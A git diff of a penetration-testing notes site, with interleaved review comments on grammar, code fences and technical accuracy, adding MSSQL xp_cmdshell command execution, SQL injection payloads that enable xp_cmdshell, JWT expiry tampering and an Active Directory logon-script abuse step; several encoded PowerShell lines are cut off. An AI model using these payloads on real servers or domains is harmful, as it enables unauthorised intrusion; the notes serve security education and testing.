diff --git a/README.md b/README.md index bb60eba..0fa712e 100644 --- a/README.md +++ b/README.md @@ -26,9 +26,9 @@ This project contains vast information in the cybersecurity field such as below: ## :warning: Disclaimer Exploit Notes are only for educational purpose or penetration testing, not attacking servers that you're not authorized.This site will not take any responsibility even if you attack the server illegally or cause damage unintentionally. -Please use the contents in this site at your own risk. +Please use this contents at your own risk. -The contents of this site are not original, but based on the information on the internet, the author actually tried and functioned. +The contents are not original, but based on the information on the internet, the author actually tried and functioned. Although the author strives to post the latest information on the content of this site as much as possible, there is no guarantee that it will always be new. I'm not a security expert, just an enthusiast, so the contents are not necessarily accurate. diff --git a/src/disclaimer.vto b/src/disclaimer.vto index be0a92d..8d5ffc5 100644 --- a/src/disclaimer.vto +++ b/src/disclaimer.vto @@ -9,10 +9,10 @@ bodyClass: body-disclaimer
Exploit Notes are only for educational purpose or penetration testing, not attacking servers that you're not authorized. This site will not take any responsibility even if you attack the server illegally or cause damage unintentionally. - Please use the contents in this site at your own risk. + Please use the contents at your own risk.
- The contents of this site are not original, but based on the information on the internet, the author actually tried and functioned. + The contents are not original, but based on the information on the internet, the author actually tried and functioned. Although the author strives to post the latest information on the content of this site as much as possible, there is no guarantee that it will always be new.
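Review bot: in the README hunk, the changed line `+Please use this contents at your own risk.` introduces a grammar error ("this contents") where the parallel edit in src/disclaimer.vto correctly reads `Please use the contents at your own risk.`; make the README line match the .vto wording so both copies of the disclaimer stay identical. While both files are being touched, the carried-over sentence "based on the information on the internet, the author actually tried and functioned" still reads awkwardly in both; "which the author has tried and confirmed to work" says the same thing clearly.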
diff --git a/src/exploit/database/mssql-pentesting.md b/src/exploit/database/mssql-pentesting.md
index 9589b74..a733036 100644
--- a/src/exploit/database/mssql-pentesting.md
+++ b/src/exploit/database/mssql-pentesting.md
@@ -7,7 +7,7 @@ tags:
refs:
- https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server
- https://learn.microsoft.com/en-us/sql/database-engine/configure-windows/xp-cmdshell-server-configuration-option?view=sql-server-ver16
-date: 2024-09-10
+date: 2024-10-13
draft: false
---
@@ -159,21 +159,10 @@ If we connected MSSQL using **impacket**, we can exeucte the Windows Shell Comma
We can execute commands the same as Windows Command Prompt.
```powershell
-# Get current user
> xp_cmdshell whoami
-# Show files and directories
-> xp_cmdshell dir
-> xp_cmdshell dir \Users
-# Show hidden files
-> xp_cmdshell dir /a
-
-# Get current directory
-> xp_cmdshell cd
-
-# Get contents of file
-> xp_cmdshell more \Users\Administrator\example.txt
-> xp_cmdshell type \Users\Administrator\example.txt
+# Execute obfuscated commands.
+> xp_cmdshell 'powershell -e
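Review bot: the added line `+> xp_cmdshell 'powershell -e` is cut off in this hunk: the single quote opened before `powershell` is never closed, and the ```powershell fence opened at the top of the block has no closing fence in the visible lines, so confirm the committed file carries the complete command and the closing fence. The comment `# Execute obfuscated commands.` is also imprecise: `-e` is shorthand for `-EncodedCommand`, which takes a Base64 string of UTF-16LE text, and that is encoding rather than obfuscation; saying so matters because encoded command lines are precisely what process-creation and script-block logging is tuned to surface. Removing the `dir`, `cd` and `type`/`more` lines leaves `whoami` as the only plain example, so consider keeping one non-encoded command beside the encoded one for readers who only need the syntax.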
diff --git a/src/exploit/reverse-engineering/cheatsheet/windbg-cheatsheet.md b/src/exploit/reverse-engineering/cheatsheet/windbg-cheatsheet.md
index 2d3de04..34c08d9 100644
--- a/src/exploit/reverse-engineering/cheatsheet/windbg-cheatsheet.md
+++ b/src/exploit/reverse-engineering/cheatsheet/windbg-cheatsheet.md
@@ -5,7 +5,7 @@ tags:
- Reverse Engineering
refs:
- https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/getting-started-with-windbg
-date: 2024-06-27
+date: 2024-10-13
draft: false
---
@@ -39,15 +39,12 @@ See command usage by opening the help menu.
# Force reload
.reload /f
-# List loaded symbols (modules)
-lm
-
# Examine symbols
-x ExecutableName!*
-# e.g.
-x notepad!*
-x notepad!wWin*
-x SampleApp!main
+x ntdll!NtQueryInformationProcess
+x notepad!*main*
+
+# Resolve symbol name from address
+ln 00007ff6`6c5814c0
```
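Review bot: the `+ln 00007ff6`6c5814c0` example uses a hard-coded address that will not exist in a reader's session; either comment it as a sample address or use an address expression such as `ln @rip`, which works as typed in any session. Dropping `-x ExecutableName!*` together with the `# e.g.` line also removes the only generic form of the `x` syntax, leaving just concrete examples; keeping the generic pattern as a comment above `x ntdll!NtQueryInformationProcess` preserves the reference value.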
### Troubleshoot for Loading Symbols
@@ -71,6 +68,19 @@ ba w 4 /w "mymodule!globalVariable == 4" mymodule!globalVariable
+## Modules
+
+```bash
+# List modules
+lm
+# List modules whose module names start with 'a'
+lm m a*
+# Display module information
+lm Dvm
+
## Breakpoints
```bash
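Review bot: the ```bash fence opened in the new Modules section is never closed in this hunk: after `+lm Dvm` and the blank `+` line the context goes straight to `## Breakpoints`, so as shown the Breakpoints heading would render inside the Modules code block; add a closing fence before `## Breakpoints`. `lm Dvm` is also incomplete as a command: the `m` option takes a pattern (`lm Options [m Pattern]`), so it should read something like `lm Dvm ntdll` to match the comment `# Display module information`.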
@@ -133,6 +143,15 @@ qd
+## Processes
+
+```sh
+# List all processes
+!process 0 0
+```
+
+
+
## Disassembly
Select **View → Disassembly** on the menu.
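Review bot: the new Processes block uses a ```sh fence while every other block in this file uses ```bash; pick one. `!process 0 0` is a kernel-mode debugger extension: it lists processes under a kernel debugging session or kernel dump, not in a user-mode WinDbg session, and the comment `# List all processes` should say so to save readers a confusing "No export process found" style failure. The three trailing `+` blank lines before `## Disassembly` are also more than the single blank line used between other sections.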
@@ -195,6 +214,47 @@ dps nt!keservicedescriptortable L4
+## Registers
+
+```bash
+# List all registers
+r
+# In thread 0
+~0 r
+# In all threads
+~* r
+
+# Display a specified register
+r rip
+
+# Display a pseudo-register
+r $peb
+r $teb
+
+# Display xmm0 in unsigned bytes 16
+r xmm0:16ub
+
+# Modify a register value
+r rax=0001
+
+# Copy RBX value to RAX
+r rax = @rbx
+```
+
+
+
+## Search Memory
+
+```bash
+# Search the DWORD 'H' in the range of 1000000 bytes from the RSP address.
+s -d @rsp L1000000 'H'
+
+# Search the string "B7" in the range of 10000000 bytes from the RSP address.
+s -a @rsp L10000000 "B7"
+```
+
+
+
## Virtual Memory Protection Information
```bash
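Review bot: in the Search Memory block, the comments describe `L1000000` and `L10000000` as "1000000 bytes" and "10000000 bytes", but WinDbg reads range sizes in the current radix, hex by default, so these ranges are 0x1000000 (16 MiB) and 0x10000000 (256 MiB); write the sizes as hex in the comments so readers do not take them as decimal. It is also worth a comment that 256 MiB is the largest range `s` accepts without the `L?` form. In the Registers block, `# Display xmm0 in unsigned bytes 16` reads better as `# Display xmm0 as 16 unsigned bytes`, and both new sections end with three `+` blank lines where the rest of the file uses one.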
@@ -219,7 +279,6 @@ u $exentry
# Unassemble backwards
ub
ub
-
```
diff --git a/src/exploit/web/jwt-pentesting.md b/src/exploit/web/jwt-pentesting.md
index b8fcea6..101ef5f 100644
--- a/src/exploit/web/jwt-pentesting.md
+++ b/src/exploit/web/jwt-pentesting.md
@@ -5,7 +5,7 @@ tags:
- Web
refs:
- https://portswigger.net/web-security/jwt
-date: 2024-09-25
+date: 2024-10-13
draft: false
---
@@ -53,6 +53,12 @@ openssl x509 -pubkey -in certificatechain.pem -noout > pubkey.pem
+## Modify `exp` Value
+
+If our JWT token is invalid, we can also try to increase the `exp` (expiration) value.
+
+
+
## Automation
**[JWT Toolkit](https://github.com/ticarpi/jwt_tool)** is a toolkit for testing, tweaking and cracking JWT.
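Review bot: `+If our JWT token is invalid, we can also try to increase the `exp` (expiration) value.` should say "expired" rather than "invalid", and it is missing the precondition: `exp` sits inside the signed payload, so raising it produces a token the server accepts only when the signature is not verified or can be re-created with the key material obtained in the steps above (the `openssl x509 -pubkey` context line belongs to that part). Without that sentence the section reads as if editing `exp` on its own works. The section also ends with three blank lines where the rest of the file uses one.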
diff --git a/src/exploit/web/security-risk/sql-injection-cheat-sheet.md b/src/exploit/web/security-risk/sql-injection-cheat-sheet.md
index 81e6ab9..b7b9d76 100644
--- a/src/exploit/web/security-risk/sql-injection-cheat-sheet.md
+++ b/src/exploit/web/security-risk/sql-injection-cheat-sheet.md
@@ -10,7 +10,7 @@ refs:
- https://portswigger.net/web-security/sql-injection/blind
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection
- https://tryhackme.com/room/adventofcyber2023
-date: 2024-05-01
+date: 2024-10-13
draft: false
---
@@ -416,10 +416,21 @@ INSERT INTO users (username, password) VALUES ('admin', '') ON CONFLICT (usernam
## Command Injection
+### MySQL
+
```text
' UNION SELECT NULL,sys_eval('whoami') FROM users-- -
```
+### MSSQL
+
+```html
+
+'; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;-- -
+
+'; exec master..xp_cmdshell 'powershell -e
## RCE
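Review bot: the MSSQL block under Command Injection is cut off: `+'; exec master..xp_cmdshell 'powershell -e` ends with an unterminated quote, and the ```html fence opened for this block has no closing fence before the `## RCE` context line, so as shown the RCE heading would be swallowed into the code block; confirm the committed file has the complete line and the closing fence. The fence is also tagged `html` while the MySQL block directly above uses `text`; use the same tag (`text` or `sql`) for both. A comment on the `sp_configure 'xp_cmdshell', 1; RECONFIGURE` line would help readers: it requires the ALTER SETTINGS server permission (held by sysadmin and serveradmin), is a server-wide configuration change, and RECONFIGURE writes the option change to the SQL Server error log, so it will not succeed silently from a low-privilege login.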
diff --git a/src/exploit/windows/active-directory/index.md b/src/exploit/windows/active-directory/index.md
index 27767f0..6861467 100644
--- a/src/exploit/windows/active-directory/index.md
+++ b/src/exploit/windows/active-directory/index.md
@@ -7,7 +7,8 @@ tags:
- Windows
refs:
- https://tryhackme.com/room/adenumeration
-date: 2024-03-26
+ - https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet
+date: 2024-10-13
draft: false
---
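Review bot: the added ref `+ - https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet` carries one more leading space than the existing `- https://tryhackme.com/room/adenumeration` entry; a YAML sequence whose items are indented differently fails to parse, which would break the frontmatter of this page, so align it with the existing item.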
@@ -113,6 +114,25 @@ dir \\dc.example.com\SYSVOL\
+## Abuse Logon Script for Other Users
+
+If the current user has the permission to write scripts in SYSVOL, we may be able to change other users logon script path.
+
+```bash
+# 1. Check the permission
+icacls C:\Windows\SYSVOL\sysvol\example.local\scripts\
+
+# 2. Modify/Add a malicious script
+'powershell -e
+
## Force Change Password Attack
If we found some username/password, and other usernames, we might be able to change other user passwords. The user needs to have **GenericAll** permission to change passwords of other users.
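Review bot: the new "Abuse Logon Script for Other Users" block is cut off at `+'powershell -e`: the quote is unterminated, step 2 announces a command that modifies or adds a script but shows only a PowerShell fragment, and the ```bash fence is not closed before the `## Force Change Password Attack` heading, so complete the block and close the fence. The fence is tagged `bash` for Windows commands (`icacls`); `powershell` or `cmd` matches the rest of the Windows pages. In the prose, "other users logon script path" needs the possessive ("other users' logon script path"), and the sentence would be clearer stating the actual condition, write access on the SYSVOL scripts directory, which is exactly what the `icacls` check in step 1 reports.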
diff --git a/src/exploit/windows/privilege-escalation/index.md b/src/exploit/windows/privilege-escalation/index.md
index 4ee76ed..56864f2 100644
--- a/src/exploit/windows/privilege-escalation/index.md
+++ b/src/exploit/windows/privilege-escalation/index.md
@@ -8,7 +8,7 @@ tags:
refs:
- https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation
- https://learn.microsoft.com/en-us/powershell/scripting/samples/working-with-registry-keys?view=powershell-7.3
-date: 2024-09-14
+date: 2024-10-13
draft: false
---
@@ -25,7 +25,9 @@ We might be able to find vulnerabilities on target Windows machine with automati
## LOLBAS (Living Off the Land Binaries, Scripts and Libraries)
[LOLBAS](https://lolbas-project.github.io/) provides misuses tools and executables already in the Windows system.
-So check the website.
+So check the website.
+
+In addition, I've created the [LOLGEN](https://lolgen.hdks.org/) that generates Living Off The Land payload.
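Review bot: the `-So check the website.` / `+So check the website.` pair is identical as shown, so this is a whitespace-only change (most likely a trailing space) that adds noise to the diff; drop it. In `+In addition, I've created the [LOLGEN](https://lolgen.hdks.org/) that generates Living Off The Land payload.`, remove "the" before the link and make "payload" plural: "In addition, I've created [LOLGEN](https://lolgen.hdks.org/), which generates Living Off The Land payloads."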
@@ -130,8 +132,8 @@ Get-Service | Where-Object {$_.Status -eq "Running"}
wmic service list
wmic service list | findstr "Backup"
-# Get target process info
-wmic process get processid,parentprocessid,executablepath | find "
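Review bot: this hunk is cut off after `-wmic process get processid,parentprocessid,executablepath | find "`, so the replacement for the removed process-listing line is not visible and cannot be reviewed; check that the committed file shows the complete command and its `find` filter argument. Since `wmic` is deprecated by Microsoft, the replacement is a good place to add the `Get-CimInstance Win32_Process` equivalent next to it so the example keeps working where WMIC is absent.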